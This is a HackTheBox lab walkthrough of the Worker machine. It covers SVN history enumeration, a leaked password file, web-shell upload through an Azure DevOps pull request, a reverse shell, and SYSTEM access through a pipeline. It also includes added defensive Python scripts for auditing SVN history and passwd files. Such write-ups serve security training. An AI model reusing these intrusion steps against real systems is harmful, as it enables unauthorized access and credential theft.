HackTheBox Worker Writeup -10.10.10.203

Welcome back to Nav1n’s HackTheBox Writeup series. In today’s post I’m going to do the brand new HTB release Worker (10.10.10.203), a medium-rated Windows machine by ekenas.

The initial foothold on this machine comes from enumerating SVNServe and finding the working subdirectory. Enumerating the newly found directory leads us to a set of credentials. Logging in to the portal lets us create branches, and we use this opportunity to upload an ASPX web shell and get a low-privileged reverse shell.

The reverse shell gives us the opportunity to obtain another set of credentials, with which we gain access using Evil-WinRM, and finally we escalate our privileges to a SYSTEM shell using Azure DevOps Pipelines.

Let us see everything in details:

Enumeration: 

As always, I add the machine IP to my hosts file as worker.htb. Next, I run the nmap scan (nmap -T4 -A -v worker.htb). The scan returns the following result:

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

So only two ports are open and listening: Microsoft IIS on port 80 and SVNServe (Apache Subversion) on port 3690.

Webserver enumeration

Upon visiting the webserver, the IIS default webpage was loaded.

Checking port 3690 in the browser, the following text loaded, and the source code didn’t reveal anything either.

I ran WFuzz for some time but nothing good was discovered, so I decided to move forward. As SVNServe was seen running on port 3690, I set my target on SVNServe.

Enumerating SVNServe

SVNServe is a custom lightweight server that allows access to Subversion repositories using Subversion’s custom network protocol. Clients connect to an SVNServe server using URL schemes like svn:// or svn+ssh://, so we can dig into the SVN repositories using the svn command-line client. Kali Linux has subversion installed by default; if not, it can be installed from the repo.

Running the svn info command, I found the repo location, the repo UUID, the total number of revisions made, a username “Nathen” and the last change date. Other than the username and the repo UUID, the rest of the information is not useful to me.

root@nav1n:~/htb/worker # svn info svn://worker.htb
Path: .
URL: svn://worker.htb
Relative URL: ^/
Repository Root: svn://worker.htb
Repository UUID: 2fc74c5a-bc59-0744-a2cd-8b7d1d07c9a1
Revision: 5
Node Kind: directory
Last Changed Author: nathen
Last Changed Rev: 5
Last Changed Date: 2020-06-20 16:52:00 +0300 (Sat, 20 Jun 2020)
root@nav1n:~/htb/worker # 

Checking the logs

First things first, let us check the logs and see if I can find something.

root@nav1n:~/htb/worker # svn log svn://worker.htb
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 16:52:00 +0300 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 16:50:20 +0300 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 16:46:19 +0300 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 16:45:16 +0300 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 16:43:43 +0300 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------
root@nav1n:~/htb/worker # 

There are 5 revisions, which I already knew; what I didn’t know is that a deployment script was added at some point. Well, this could be helpful.

Going further with enumerating SVN, I started to run the commands listed in svn help one by one. The command svn list svn://worker.htb lists the repository contents available for public view. Running svn list pulls 2 entries (dimension.worker.htb/ and moved.txt). dimension.worker.htb/ seemed to be a directory, and moved.txt reads as below:

root@nav1n:~/htb/worker # svn list svn://worker.htb
dimension.worker.htb/
moved.txt
root@nav1n:~/htb/worker # svn cat svn://worker.htb/moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb
// The Worker team :)
root@nav1n:~/htb/worker # 

Now we have found two more hostnames:

  • devops.worker.htb
  • dimension.worker.htb

Adding them to the hosts file and visiting the pages, devops.worker.htb requires authentication and dimension.worker.htb loads an HTML5 page.

Since I couldn’t find any hint, I decided to head back to SVN and download the directory. The svn export command let me download the file and the directory into my local directory.

root@nav1n:~/htb/worker # svn export svn://worker.htb/dimension.worker.htb/
A dimension.worker.htb
A dimension.worker.htb/LICENSE.txt
A dimension.worker.htb/README.txt
A dimension.worker.htb/assets
--snip--
A dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A dimension.worker.htb/images
A dimension.worker.htb/images/bg.jpg
A dimension.worker.htb/images/overlay.png
A dimension.worker.htb/images/pic01.jpg
A dimension.worker.htb/images/pic02.jpg
A dimension.worker.htb/images/pic03.jpg
A dimension.worker.htb/index.html
Exported revision 5.
root@nav1n:~/htb/worker #

Checking each folder and file one by one led me nowhere; there is nothing useful inside, so it could be a rabbit hole. Around the same time, someone at HTB hinted to check the revisions.

The checkout command can be used to check out a working copy from a repository. Let us see if we could pull something out of the repository, revision by revision. There are 5 revisions in total so far.

Usage: checkout URL[@REV]… [PATH]

root@nav1n:~/htb/worker # svn -h checkout
checkout (co): Check out a working copy from a repository.
usage: checkout URL[@REV]... [PATH]

  If specified, REV determines in which revision the URL is first
  looked up.

  If PATH is omitted, the basename of the URL will be used as
  the destination. If multiple URLs are given each will be checked
  out into a sub-directory of PATH, with the name of the sub-directory
  being the basename of the URL.

After running the checkout command for each revision and looking at the changes, the only thing I found was that a new file, deploy.ps1, a PowerShell script, was added in an early revision and later deleted.

root@nav1n:~/htb/worker # svn checkout -r 1 svn://worker.htb  
   C dimension.worker.htb
.
.
.
   A dimension.worker.htb/index.html
Checked out revision 1.
root@nav1n:~/htb/worker # svn checkout -r 2 svn://worker.htb  
A    deploy.ps1
Checked out revision 2.
root@nav1n:~/htb/worker # svn checkout -r 3 svn://worker.htb  
U    deploy.ps1
Checked out revision 3.
root@nav1n:~/htb/worker # svn checkout -r 4 svn://worker.htb  
D    deploy.ps1
Checked out revision 4.
root@nav1n:~/htb/worker # svn checkout -r 5 svn://worker.htb  
A    moved.txt
Checked out revision 5.
root@nav1n:~/htb/worker # 
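What the revision-by-revision checkout above shows is the general lesson of this box: deleting a file from a Subversion repository only removes it from HEAD, and every earlier revision still serves it. The script below is an added example, not part of the original writeup, that parses svn log -v output and reports every path that was deleted later in the history together with the last revision from which it can still be exported. The log text it runs on is constructed to match the sequence seen on this machine (deploy.ps1 added, modified, then deleted, moved.txt added last); the real output would come from svn log -v svn://worker.htb.

```python
"""Find paths deleted from HEAD that remain retrievable from an earlier revision.

Added example, not from the original writeup. SAMPLE_LOG is CONSTRUCTED to
mirror the revision sequence observed on this box; the parser expects the
format of `svn log -v` (a 72-dash separator, an "rN | author | date | N lines"
header, a "Changed paths:" block with "   A /path"-style lines, then the message).
"""
import re

SAMPLE_LOG = """\
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 16:52:00 +0300 (Sat, 20 Jun 2020) | 1 line
Changed paths:
   A /moved.txt

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 16:50:20 +0300 (Sat, 20 Jun 2020) | 1 line
Changed paths:
   D /deploy.ps1

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 16:46:19 +0300 (Sat, 20 Jun 2020) | 1 line
Changed paths:
   M /deploy.ps1

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 16:45:16 +0300 (Sat, 20 Jun 2020) | 1 line
Changed paths:
   A /deploy.ps1

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 16:43:43 +0300 (Sat, 20 Jun 2020) | 1 line
Changed paths:
   A /dimension.worker.htb
   A /dimension.worker.htb/index.html

First version
------------------------------------------------------------------------
"""

REV_HEADER = re.compile(r"^r(\d+) \| (\S+) \| (.+?) \| \d+ lines?$")
CHANGED_PATH = re.compile(r"^   ([ADMR]) (\S+)(?: \(from .+\))?$")
SEPARATOR = re.compile(r"^-{10,}$")


def parse_svn_log(text):
    """Return a list of (rev, author, [(action, path), ...]) ordered oldest first."""
    revisions = []
    current = None
    for line in text.splitlines():
        if SEPARATOR.match(line):
            if current:
                revisions.append(current)
            current = None
            continue
        m = REV_HEADER.match(line)
        if m:
            current = (int(m.group(1)), m.group(2), [])
            continue
        m = CHANGED_PATH.match(line)
        if m and current is not None:
            current[2].append((m.group(1), m.group(2)))
    if current:
        revisions.append(current)
    return sorted(revisions, key=lambda r: r[0])


def recoverable_deleted_paths(revisions):
    """Map each path deleted in the history to the last revision in which it
    still existed. `svn cat -r REV` / `svn export -r REV` still return it."""
    last_present = {}
    recoverable = {}
    for rev, _author, changes in revisions:
        for action, path in changes:
            if action in ("A", "M", "R"):
                last_present[path] = rev
            elif action == "D" and path in last_present:
                recoverable[path] = last_present.pop(path)
    return recoverable


if __name__ == "__main__":
    revs = parse_svn_log(SAMPLE_LOG)
    for path, rev in recoverable_deleted_paths(revs).items():
        print(f"{path}: deleted from HEAD but present at r{rev} "
              f"(svn cat -r {rev} svn://worker.htb{path})")
```

On the constructed log this reports /deploy.ps1 as recoverable from r3, which is exactly why a secret committed "just once" has to be rotated rather than deleted: running this over a repository's own log is a quick way for a maintainer to see what history still exposes.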

Exporting deploy.ps1

The deploy.ps1 script couldn’t be exported with a plain svn export; instead the --force flag is required in the command. After exporting deploy.ps1, I found a credential for the user Nathen, the guy who made the revisions.

nathen:wendel98

root@nav1n:~/htb/worker # svn export -r 2 svn://worker.htb/ --force  
A    .
A    deploy.ps1
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt

The only thing asking for credentials so far on worker.htb is http://devops.worker.htb/. I tried the creds there and successfully logged in.

The portal that opened was an Azure DevOps project dashboard. Going through the app, it didn’t take long for me to understand that it is a Git-like system. So there should be a way to create our own branch with malicious code and run it. Since it’s Windows-based there are some limitations, but an ASPX shell should work here.

Creating a new branch

Creating a new branch is as easy as it should be. From the http://devops.worker.htb/ekenas/SmartHotel360/_git/spectral URL, I clicked on master -> New branch and named it “SmartHole”.

With the branch created, the next step is to upload my web shell. My preferred web shell is Awen WebShell-2.

No changes needed to be made; I just copied the raw script, created my own aspx file called “shell.aspx” and uploaded it using the file upload function.

Once uploaded, I added a comment (not required though) and committed it.

And the file upload was confirmed.

Pull Request

From the left menu, I selected “Pull Request”, and when the pull request page opened, I clicked the “New Pull Request” button. This opened the repo pull request page; I made sure I selected the right branch (SmartHole) and clicked the Create button.

From the newly opened page, I clicked Approve and Complete.

Once the pull request was complete, I visited the site (spectral.worker.htb/shell.aspx) and there it goes: my shell is readily waiting for my orders.

I ran my listener, and from the web shell I set my IP and port, clicked Connect back Shell and boom, there I have the reverse shell in my listener.

For further enumeration I need a handy tool like WinPEAS, so I uploaded winPEAS.bat to the temp directory and executed it.

Running WinPEAS, I found several interesting items; among them I noticed a mounted disk W:.

Getting User Flag

cd W:
PS W:\> dir
dir


    Directory: W:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-16     18:59                agents                                                                
d-----       2020-03-28     14:57                AzureDevOpsData                                                       
d-----       2020-04-03     11:31                sites                                                                 
d-----       2020-06-20     16:04                svnrepos                                                              

PS W:\> cd sites
cd sites
PS W:\sites> dir
dir

    Directory: W:\sites


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-07-20     23:43                alpha.worker.htb                                                      
d-----       2020-07-20     23:43                cartoon.worker.htb                                                    
d-----       2020-04-03     12:27                dimension.worker.htb                                                  
d-----       2020-07-20     23:43                lens.worker.htb                                                       
d-----       2020-07-20     23:43                solid-state.worker.htb                                                
d-----       2020-08-18     21:54                spectral.worker.htb                                                   
d-----       2020-07-20     23:43                story.worker.htb                                                      
d-----       2020-07-20     23:43                twenty.worker.htb                                                     
PS W:\sites> 

Going further, inside W:\svnrepos\www\conf I found a jackpot: a password file that says “Passwords for SVNServe”.


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       2020-06-20     11:29           1112 authz                                                                 
-a----       2020-06-20     11:29            904 hooks-env.tmpl                                                        
-a----       2020-06-20     15:27           1031 passwd                                                                
-a----       2020-04-04     20:51           4454 svnserve.conf                                                         


PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
PS W:\svnrepos\www\conf> 
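The passwd file above is svnserve’s own cleartext credential store: anyone who can read it holds working logins, and on this box one of them was also a valid Windows account. The script below is an added example, not from the original writeup, that parses that [users] format and audits it for the things a defender would want to know first: how many cleartext credentials it holds, usernames defined more than once (nichin appears twice above), and passwords shared between accounts (robish and ronkay both use “onesare”). SAMPLE_PASSWD is constructed from a subset of the entries shown on this page.

```python
"""Audit an svnserve passwd file ([users] section, "name = password" lines).

Added example, not from the original writeup. SAMPLE_PASSWD is CONSTRUCTED
from a subset of the entries shown in the post; point parse_svnserve_passwd
at the real file contents (e.g. open(path).read()) to audit a live server.
"""
from collections import defaultdict

SAMPLE_PASSWD = """\
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
robish = onesare
robisl = wolves11
ronkay = onesare
"""


def parse_svnserve_passwd(text):
    """Return (user, password) pairs from the [users] section, keeping
    duplicates so that they can be reported."""
    entries = []
    in_users = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_users = line[1:-1].strip().lower() == "users"
            continue
        if in_users and "=" in line:
            user, _, password = line.partition("=")
            entries.append((user.strip(), password.strip()))
    return entries


def audit_passwd(entries):
    """Return human-readable findings about the parsed credential list."""
    findings = []
    user_count = defaultdict(int)
    users_by_password = defaultdict(list)
    for user, password in entries:
        user_count[user] += 1
        users_by_password[password].append(user)
    if entries:
        findings.append(
            f"{len(entries)} cleartext credentials stored; svnserve's passwd "
            f"file has no hashing, so file read access equals credential access")
    for user, n in user_count.items():
        if n > 1:
            findings.append(
                f"user '{user}' defined {n} times; only one entry can take effect")
    for password, users in users_by_password.items():
        if len(users) > 1:
            findings.append(f"password shared by {', '.join(sorted(users))}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(parse_svnserve_passwd(SAMPLE_PASSWD)):
        print("-", finding)
```

The shared-password check is the one that matters most on a host like this one: when the same password also unlocks a Windows account, the SVN password file is effectively a Windows password file, which is how the user step of this box works.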

Checking the real users on the machine, the credential that matched was robisl:wolves11. Next, I used Evil-WinRM to log in to the machine and got the user flag from RobisL’s desktop.

root@nav1n:~/htb/worker # ruby evil-winrm.rb -i worker.htb -u robisl -p wolves11                                    
Evil-WinRM shell v1.8
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> cd /
*Evil-WinRM* PS C:\> cd Users/robisl/Desktop/
*Evil-WinRM* PS C:\Users\robisl\Desktop> dir
    Directory: C:\Users\robisl\Desktop
Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-ar---        8/18/2020   9:36 PM             34 user.txt                                                                                                                                                                                                
*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
b9efc951924eeea4d4b31a1040844eb9
*Evil-WinRM* PS C:\Users\robisl\Desktop> 

Privilege Escalation:

User RobisL’s whoami info:

*Evil-WinRM* PS C:\Users\robisl\Desktop> whoami /all

USER INFORMATION
----------------

User Name     SID                                           
============= ==============================================
worker\robisl S-1-5-21-3082756831-2119193761-3468718151-1330


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                            Attributes                                        
====================================== ================ ============================================== ==================================================
Everyone                               Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
WORKER\Production                      Alias            S-1-5-21-3082756831-2119193761-3468718151-1018 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users        Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192                                                                                      


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

*Evil-WinRM* PS C:\Users\robisl\Desktop> 

The user is a member of Authenticated Users, which suggests he should be able to access Azure DevOps. Upon trying, I successfully logged in as RobisL.

There is a new project in Robin’s dashboard called “PartsUnlimited”. Going through Robin’s dashboard, I noticed Robin can run pipelines on a pool with admin privileges, so anything Robin runs in the pipeline should get executed as SYSTEM.

Creating A New Pipeline

From Pipelines in the main dashboard, I clicked Create New Pipeline. This opens a code connection page; I chose Azure Repos Git and from there I chose the current project, PartsUnlimited.

In the next step, I was asked to “Configure your pipeline”, where I was offered several OSes and code bases to configure my project. I chose “azure-pipelines.yml”, which is the default option with only a couple of lines to execute.

With the pipeline ready and a default script to be deployed, I just amended two lines: I changed the pool to Setup and the script to type C:\Users\Administrator\Desktop\root.txt.

Once I had my script ready, I clicked on Save and run; a new window opened, I chose to create a new branch and clicked on “Save and run”.

After a few seconds, I was greeted with below screen:

Now that everything seemed to be working, I clicked on my step “Run a one-line script”, the step’s log loaded and the root flag was read.

Root.txt

That’s it; this is how the machine Worker has been pwned today. Thank you for your visit. I’m working on the last two hardest boxes and my writeup will be live soon.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

2 Comments

Roshan kc
6 months ago

Bro, u have to describe how u got the reverse shell and how to pull the request, and I wanna try urs, though I got root already and I got confused to get shell for IIS.

Francoa
5 months ago

Hey nav1n, how did u get the SAM/SYSTEM hashes from admin??